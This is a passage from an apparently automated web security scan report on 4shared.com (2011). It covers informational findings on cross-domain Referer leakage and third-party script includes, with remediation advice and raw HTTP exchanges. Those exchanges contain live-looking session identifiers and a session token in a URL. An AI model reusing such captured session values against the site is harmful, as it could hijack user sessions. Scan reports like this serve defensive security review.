Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<hr />
<form name="paymentForm12m" action="https://www.plimus.com/jsp/buynow.jsp?contractId=2268552&email=&language=ENGLISH&language=ENGLISH" method="POST" class="buyForm">
<div class="btn" onclick="return submitSelectedPurchase('12m');">
...[SNIP]...

10. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<input type="text" name="openid" id="openid" class="regfield openid_url" style="width:172px"/>
<a href="http://openid.net/" class="float" target="_blank"><img src="http://static.4shared.com/images/icons/16x16/howto.gif" alt="" width="16" height="16" class="absmid" />
...[SNIP]...
<br />
<a href="http://twitter.com/#!/4shared" target="_blank" title="Follow us on Twitter" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="tw">
...[SNIP]...
<br />
<a href="http://www.facebook.com/official.4shared" target="_blank" title="Follow us on Facebook" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="fb">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<div class="statcounter">
<a title="free hit counter" href="http://www.statcounter.com/free_hit_counter.html" target="_blank">
<img class="statcounter" src="http://c.statcounter.com/4135125/0/e8ecc2ac/1/" alt="free hit counter" >
</a>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-23Fqia_-MkKko" target="_blank">
<img src="http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast">
</a>
...[SNIP]...

10.2. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<div align="center" style="margin:15px 0">
<a href="http://directory.itmsecure.com/directory/4shared-com/" target="_blank"><img src="http://static.4shared.com/images/ITMseal.png" width="64" height="37" alt="ITMSecure trust mark" />
...[SNIP]...
<br />
<a href="http://twitter.com/#!/4shared" target="_blank" title="Follow us on Twitter" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="tw">
...[SNIP]...
<br />
<a href="http://www.facebook.com/official.4shared" target="_blank" title="Follow us on Facebook" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="fb">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<div class="statcounter">
<a title="free hit counter" href="http://www.statcounter.com/free_hit_counter.html" target="_blank">
<img class="statcounter" src="http://c.statcounter.com/4135125/0/e8ecc2ac/1/" alt="free hit counter" >
</a>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-23Fqia_-MkKko" target="_blank">
<img src="http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast">
</a>
...[SNIP]...

11. Cross-domain script include  previous  next
There are 20 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


11.1. http://www.4shared.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT


<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.2. http://www.4shared.com/desktop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /desktop/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 43981
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4sh
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.3. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.4. http://www.4shared.com/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enterprise/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /enterprise/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/premium.jsp?ref=header
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23755
Date: Fri, 29 Jul 2011 13:59:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Enterprise</title
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.5. http://www.4shared.com/icons/16x16/doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/doc.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /icons/16x16/doc.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/doc.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38530


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.6. http://www.4shared.com/icons/16x16/pdf.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/pdf.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /icons/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:25 GMT
Content-Length: 38524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.7. http://www.4shared.com/icons/16x16/png.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/png.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /icons/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:00 GMT
Content-Length: 38691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.8. http://www.4shared.com/images/asf-logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.9. http://www.4shared.com/images/tomcat.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AE600031E51DE28C97F64F946EE76F5.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
